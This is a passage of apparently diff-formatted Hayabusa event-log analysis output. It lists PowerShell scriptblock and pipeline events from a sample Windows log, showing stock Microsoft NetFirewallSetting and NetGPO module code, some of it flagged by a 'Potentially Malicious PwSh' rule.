$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.893 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.894 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.896 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.897 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.898 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.922 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.922 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 